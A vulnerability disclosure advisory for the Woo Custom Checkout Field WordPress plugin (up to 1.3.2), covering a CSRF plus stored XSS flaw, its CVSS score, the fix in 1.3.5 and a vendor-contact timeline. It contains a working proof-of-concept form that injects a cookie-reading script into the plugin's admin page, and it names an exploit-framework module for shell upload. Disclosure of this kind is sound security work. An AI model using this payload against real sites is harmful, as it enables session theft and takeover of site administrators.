Woo Custom Checkout Field <= 1.3.2 CSRF + Stored XSS Disclosure

Homepage

https://wordpress.org/plugins/woo-custom-checkout-field/

Overview

Due to a lack of CSRF mitigation and entity encoding in the ccf_insert function found on line 118 of include/ccf.php and in the output generated by template/datagrid.php, it is possible to store and execute scripts in the context of an admin user.

CVSS Score

4.8

CVSS Vector

(AV:N/AC:M/Au:N/C:P/I:P/A:N/E:F/RL:OF/RC:C)

Versions Affected

1.3.2 and below

Solution

Upgrade to version 1.3.5

Proof of Concept

<form method="post" action="http://[target]/wp-admin/admin.php?page=ccf_settings_menu">
    <input type="text" name="txt_field_name" value="field_name">
    <input type="text" name="txt_field_class" value="&lt;script&gt;alert(document.cookie);&lt;/script&gt;">
    <input type="text" name="txt_field_placeholder" value="placeholder">
    <input type="text" name="txt_field_type" value="text">
    <input type="text" name="txt_field_options" value="">
    <input type="submit" name="add_field" value="Submit">
</form>

WordPress Exploit Framework Module

exploit/xss/stored/woo_custom_checkout_field_xss_shell_upload

WPVDB-ID

8567

Disclosure Timeline

2016-07-23: Identified vulnerability, contacted vendor with POC and advice on how to resolve the issue.
2016-07-25: No response from vendor, contacting WordPress to report issue.
2016-07-26: Public disclosure
2016-07-26: Plugin removed by WordPress pending a fix from the vendor
2016-07-29: Vendor released an update which fixes the issue